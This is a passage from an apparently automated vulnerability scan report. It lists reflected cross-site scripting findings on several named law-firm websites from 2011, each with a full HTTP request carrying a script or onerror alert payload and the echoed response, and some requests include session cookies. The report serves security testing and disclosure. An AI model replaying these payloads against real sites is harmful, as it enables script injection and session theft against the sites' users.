This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/biotechnology?406d7"><script>alert(1)</script>6b5c14438ca=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.7.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:28:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/biotechnology?406d7"><script>alert(1)</script>6b5c14438ca=1&amp;printable=yes">
...[SNIP]...

4.157. http://www.hbsr.com/practices_technologies/index [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/index

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e3ab"><script>alert(1)</script>633a1638eef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies9e3ab"><script>alert(1)</script>633a1638eef/index HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.1.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:26:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies9e3ab"><script>alert(1)</script>633a1638eef/index-print">
...[SNIP]...

4.158. http://www.hbsr.com/practices_technologies/index [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/index

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66193"><script>alert(1)</script>5ba64a12336 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/index66193"><script>alert(1)</script>5ba64a12336 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.1.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:26:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/index66193"><script>alert(1)</script>5ba64a12336-print">
...[SNIP]...

4.159. http://www.hbsr.com/practices_technologies/index [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/index

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23205"><script>alert(1)</script>ebacbb96fc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/index?23205"><script>alert(1)</script>ebacbb96fc1=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.1.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:26:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/index?23205"><script>alert(1)</script>ebacbb96fc1=1&amp;printable=yes">
...[SNIP]...

4.160. http://www.hbsr.com/practices_technologies/software [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/software

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 940d0"><script>alert(1)</script>8c7d3e9285e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies940d0"><script>alert(1)</script>8c7d3e9285e/software HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/telecommunications
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.3.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:27:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies940d0"><script>alert(1)</script>8c7d3e9285e/software-print">
...[SNIP]...

4.161. http://www.hbsr.com/practices_technologies/software [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/software

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 931a5"><script>alert(1)</script>bea7ff528b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/software931a5"><script>alert(1)</script>bea7ff528b1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/telecommunications
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.3.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:27:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/software931a5"><script>alert(1)</script>bea7ff528b1-print">
...[SNIP]...

4.162. http://www.hbsr.com/practices_technologies/software [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/software

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cf66"><script>alert(1)</script>9fc1b0ef96e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/software?6cf66"><script>alert(1)</script>9fc1b0ef96e=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/telecommunications
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.3.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:27:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/software?6cf66"><script>alert(1)</script>9fc1b0ef96e=1&amp;printable=yes">
...[SNIP]...

4.163. http://www.hbsr.com/practices_technologies/telecommunications [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/telecommunications

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c3c6"><script>alert(1)</script>c469b26ecf4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies7c3c6"><script>alert(1)</script>c469b26ecf4/telecommunications HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.2.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:26:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies7c3c6"><script>alert(1)</script>c469b26ecf4/telecommunications-print">
...[SNIP]...

4.164. http://www.hbsr.com/practices_technologies/telecommunications [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/telecommunications

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6292"><script>alert(1)</script>f9653883093 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/telecommunicationsd6292"><script>alert(1)</script>f9653883093 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.2.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:26:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/telecommunicationsd6292"><script>alert(1)</script>f9653883093-print">
...[SNIP]...

4.165. http://www.hbsr.com/practices_technologies/telecommunications [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/telecommunications

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a22e"><script>alert(1)</script>2ad03aa0f89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/telecommunications?4a22e"><script>alert(1)</script>2ad03aa0f89=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.2.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:26:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/telecommunications?4a22e"><script>alert(1)</script>2ad03aa0f89=1&amp;printable=yes">
...[SNIP]...

4.166. http://www.pillsburylaw.com/connect_forgotpassword.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbbe9"><a>9ff6b508074 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /connect_forgotpassword.cfm?p=60&cbbe9"><a>9ff6b508074=1 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=60
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.5.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812912;path=/
Set-Cookie: CFTOKEN=34459793;path=/
Date: Thu, 12 May 2011 12:32:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
<input type="hidden" class="formelement2" NAME="referringPage" VALUE="http://www.pillsburylaw.com/index.cfm?p=60&cbbe9"><a>9ff6b508074=1">
...[SNIP]...

4.167. http://www.pillsburylaw.com/connect_forgotpassword.cfm [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The value of the p request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24eb9"><img%20src%3da%20onerror%3dalert(1)>4643c09008e was submitted in the p parameter. This input was echoed as 24eb9"><img src=a onerror=alert(1)>4643c09008e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /connect_forgotpassword.cfm?p=6024eb9"><img%20src%3da%20onerror%3dalert(1)>4643c09008e HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=60
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.5.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812912;path=/
Set-Cookie: CFTOKEN=34459793;path=/
Date: Thu, 12 May 2011 12:32:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
<input type="hidden" name="p" value="6024eb9"><img src=a onerror=alert(1)>4643c09008e" />
...[SNIP]...

4.168. http://www.pillsburylaw.com/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16e81"><a>f671e58fc63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /index.cfm?pageID=60&16e81"><a>f671e58fc63=1 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.2.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A21%3A46; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812912;path=/
Set-Cookie: CFTOKEN=34459793;path=/
Date: Thu, 12 May 2011 12:32:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...
<a href="printfriendly.cfm?pageID=60&16e81"><a>f671e58fc63=1&printF=1" target="_blank">
...[SNIP]...

4.169. http://www.stroock.com/sitecontent.cfm [contentID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stroock.com
Path:   /sitecontent.cfm

Issue detail

The value of the contentID request parameter is copied into the HTML document as plain text between tags. The payload bbde0<img%20src%3da%20onerror%3dalert(1)>1ea5943f0a8 was submitted in the contentID parameter. This input was echoed as bbde0<img src=a onerror=alert(1)>1ea5943f0a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sitecontent.cfm?contentID=64bbde0<img%20src%3da%20onerror%3dalert(1)>1ea5943f0a8 HTTP/1.1
Host: www.stroock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.stroock.com/
Cookie: CFID=6906919; CFTOKEN=98918862; __utma=266256077.1614775241.1305202918.1305202918.1305202918.1; __utmb=266256077.1.10.1305202918; __utmc=266256077; __utmz=266256077.1305202918.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Stroock%20%26%20Stroock%20%26%20Lavan

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 12:26:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


